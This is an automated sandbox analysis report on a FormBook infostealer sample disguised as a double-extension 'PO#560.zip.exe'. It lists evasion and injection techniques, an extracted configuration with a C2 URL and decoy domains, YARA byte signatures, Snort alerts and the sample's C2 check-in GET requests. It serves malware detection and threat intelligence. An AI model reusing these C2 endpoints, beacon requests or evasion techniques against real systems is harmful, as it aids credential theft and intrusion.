Loading ...

Play interactive tourEdit tour

Analysis Report PO#560.zip.exe

Overview

General Information

Sample Name:PO#560.zip.exe
Analysis ID:383967
MD5:225f5938273f006356fd813e46e3fcef
SHA1:347cd34fd095ae8f843ee436dde5043bba8fb192
SHA256:69a395d24a3536ef7698ae036596bed55856d4777356946f498faec3f1395f8d
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO#560.zip.exe (PID: 3468 cmdline: 'C:\Users\user\Desktop\PO#560.zip.exe' MD5: 225F5938273F006356FD813E46E3FCEF)
    • PO#560.zip.exe (PID: 5448 cmdline: {path} MD5: 225F5938273F006356FD813E46E3FCEF)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 4952 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 1308 cmdline: /c del 'C:\Users\user\Desktop\PO#560.zip.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.talllensphotography.com/md5/"], "decoy": ["gnd3.com", "thedrata.com", "carbeloy.com", "impactpittsburg.com", "sussage.com", "mikespencil.com", "ghoshtechno.com", "partnermassagetherapy.com", "nagago.asia", "parkviee.com", "kichisanpo.com", "awbaviation.com", "shopvibeup.com", "ab-alamode.com", "cash4homesutah.com", "funbrushstrokes.com", "adeleycar.com", "actsbooking.com", "rojorodi.icu", "fleurdelyscantho.com", "bobwhiteknives.com", "entrefloresdr.com", "eurostarcellars.com", "shipu143.com", "lindsaydrees.com", "turningtecc.com", "reusedearth.com", "theemperorbrand.com", "afrohiphops.com", "officehoursonly.com", "pharmacistscbd.com", "yaanpay.com", "mymoxypets.com", "sharehealthalliance.com", "sparktvnetwork.com", "marymoorridgecondo.com", "honest-woman.com", "blitzerfoto.net", "vanhanhnhansu.com", "lawyerspledge.com", "parkwashingtondc.com", "worldwideexpressweb.net", "oatml.com", "acquaintancenutritious.info", "lukmanmalik.xyz", "eudorabcantik.com", "fotosdepueblo.com", "latelierp.com", "dogmomtreats.com", "beerthirtyslc.com", "greenlightsmokables.com", "newyorkbusinesssolutions.com", "latravesia.net", "worldvisioncompany.com", "radiusbrisbane.com", "beachhammocking.com", "games-daizo.com", "customkreation.com", "universiteyehazirlan.com", "studentpalace.rentals", "vizecix.com", "new123movies.pro", "skincolored.com", "goldstespresso.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.PO#560.zip.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.PO#560.zip.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.PO#560.zip.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        4.2.PO#560.zip.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.PO#560.zip.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.talllensphotography.com/md5/Avira URL Cloud: Label: malware
          Source: http://www.talllensphotography.com/md5/?IBcTaR=Djxti6ShQzh8&DzrLH=JP702FCblU1K1nbBBTKIcgs3vFjx7LTnku6fbfQ3JvhMEqeKMVIpxerk2LYg3Mu/rBkVAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.talllensphotography.com/md5/"], "decoy": ["gnd3.com", "thedrata.com", "carbeloy.com", "impactpittsburg.com", "sussage.com", "mikespencil.com", "ghoshtechno.com", "partnermassagetherapy.com", "nagago.asia", "parkviee.com", "kichisanpo.com", "awbaviation.com", "shopvibeup.com", "ab-alamode.com", "cash4homesutah.com", "funbrushstrokes.com", "adeleycar.com", "actsbooking.com", "rojorodi.icu", "fleurdelyscantho.com", "bobwhiteknives.com", "entrefloresdr.com", "eurostarcellars.com", "shipu143.com", "lindsaydrees.com", "turningtecc.com", "reusedearth.com", "theemperorbrand.com", "afrohiphops.com", "officehoursonly.com", "pharmacistscbd.com", "yaanpay.com", "mymoxypets.com", "sharehealthalliance.com", "sparktvnetwork.com", "marymoorridgecondo.com", "honest-woman.com", "blitzerfoto.net", "vanhanhnhansu.com", "lawyerspledge.com", "parkwashingtondc.com", "worldwideexpressweb.net", "oatml.com", "acquaintancenutritious.info", "lukmanmalik.xyz", "eudorabcantik.com", "fotosdepueblo.com", "latelierp.com", "dogmomtreats.com", "beerthirtyslc.com", "greenlightsmokables.com", "newyorkbusinesssolutions.com", "latravesia.net", "worldvisioncompany.com", "radiusbrisbane.com", "beachhammocking.com", "games-daizo.com", "customkreation.com", "universiteyehazirlan.com", "studentpalace.rentals", "vizecix.com", "new123movies.pro", "skincolored.com", "goldstespresso.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO#560.zip.exeVirustotal: Detection: 32%Perma Link
          Source: PO#560.zip.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO#560.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO#560.zip.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 4.2.PO#560.zip.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO#560.zip.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO#560.zip.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: PO#560.zip.exe, 00000004.00000002.279505547.00000000014C9000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: PO#560.zip.exe, 00000004.00000002.279505547.00000000014C9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO#560.zip.exe, 00000004.00000002.279978802.000000000188F000.00000040.00000001.sdmp, systray.exe, 0000000A.00000002.482167165.0000000004ABF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO#560.zip.exe, 00000004.00000002.279978802.000000000188F000.00000040.00000001.sdmp, systray.exe
          Source: C:\Users\user\Desktop\PO#560.zip.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 185.53.177.14:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 185.53.177.14:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 185.53.177.14:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 50.118.194.26:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 50.118.194.26:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 50.118.194.26:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.talllensphotography.com/md5/
          Source: global trafficHTTP traffic detected: GET /md5/?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G+A1ySyYzJdTo7KJPmykLVFLh3 HTTP/1.1Host: www.mymoxypets.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md5/?DzrLH=dXMJ/yrosuk4D2OPjKCB839u/6tvM7QWLhghObYdXqbvabebVJQVkG1vpLTC6vFDwMgu&IBcTaR=Djxti6ShQzh8 HTTP/1.1Host: www.new123movies.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md5/?IBcTaR=Djxti6ShQzh8&DzrLH=JP702FCblU1K1nbBBTKIcgs3vFjx7LTnku6fbfQ3JvhMEqeKMVIpxerk2LYg3Mu/rBkV HTTP/1.1Host: www.talllensphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 151.101.1.211 151.101.1.211
          Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: global trafficHTTP traffic detected: GET /md5/?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G+A1ySyYzJdTo7KJPmykLVFLh3 HTTP/1.1Host: www.mymoxypets.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md5/?DzrLH=dXMJ/yrosuk4D2OPjKCB839u/6tvM7QWLhghObYdXqbvabebVJQVkG1vpLTC6vFDwMgu&IBcTaR=Djxti6ShQzh8 HTTP/1.1Host: www.new123movies.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md5/?IBcTaR=Djxti6ShQzh8&DzrLH=JP702FCblU1K1nbBBTKIcgs3vFjx7LTnku6fbfQ3JvhMEqeKMVIpxerk2LYg3Mu/rBkV HTTP/1.1Host: www.talllensphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.mymoxypets.com
          Source: explorer.exe, 00000005.00000000.261798460.00000000089BF000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO#560.zip.exe, 00000000.00000003.222424567.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.
          Source: PO#560.zip.exe, 00000000.00000003.213421217.00000000060AF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: PO#560.zip.exe, 00000000.00000003.213718774.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com2
          Source: PO#560.zip.exe, 00000000.00000003.213964934.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com3
          Source: PO#560.zip.exe, 00000000.00000003.213824153.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com9
          Source: PO#560.zip.exe, 00000000.00000003.213718774.00000000060B0000.00000004.00000001.sdmp, PO#560.zip.exe, 00000000.00000003.213964934.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comC
          Source: PO#560.zip.exe, 00000000.00000003.213964934.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comI
          Source: PO#560.zip.exe, 00000000.00000003.214819617.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comQ
          Source: PO#560.zip.exe, 00000000.00000003.213824153.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: PO#560.zip.exe, 00000000.00000003.213718774.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC)
          Source: PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCm
          Source: PO#560.zip.exe, 00000000.00000003.213824153.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coma
          Source: PO#560.zip.exe, 00000000.00000003.213824153.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comc
          Source: PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comdd_
          Source: PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comego
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: PO#560.zip.exe, 00000000.00000003.213718774.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comwdth
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: PO#560.zip.exe, 00000000.00000003.215738986.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers#
          Source: PO#560.zip.exe, 00000000.00000003.215703797.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: PO#560.zip.exe, 00000000.00000003.216534912.00000000060B0000.00000004.00000001.sdmp, PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: PO#560.zip.exe, 00000000.00000003.216063105.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: PO#560.zip.exe, 00000000.00000003.215780122.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers_
          Source: PO#560.zip.exe, 00000000.00000002.241188316.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasef
          Source: PO#560.zip.exe, 00000000.00000002.241188316.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comav
          Source: PO#560.zip.exe, 00000000.00000002.241188316.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: PO#560.zip.exe, 00000000.00000003.212947601.00000000060AE000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: PO#560.zip.exe, 00000000.00000003.212947601.00000000060AE000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn;
          Source: PO#560.zip.exe, 00000000.00000003.212947601.00000000060AE000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnt-i%
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmp, PO#560.zip.exe, 00000000.00000003.214435274.000000000608A000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: PO#560.zip.exe, 00000000.00000003.214335139.0000000006083000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//d1
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/I
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/R
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/d
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/en-u
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/hs
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: PO#560.zip.exe, 00000000.00000003.214608357.000000000608C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/I
          Source: PO#560.zip.exe, 00000000.00000003.214608357.000000000608C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/hs
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-u
          Source: PO#560.zip.exe, 00000000.00000003.214521453.000000000608A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w
          Source: PO#560.zip.exe, 00000000.00000003.213421217.00000000060AF000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.
          Source: PO#560.zip.exe, 00000000.00000003.215072761.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: PO#560.zip.exe, 00000000.00000003.215261953.00000000060B0000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.4
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: PO#560.zip.exe, 00000000.00000002.247136868.0000000007292000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: PO#560.zip.exe, 00000000.00000003.213564531.00000000060B0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.261880107.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
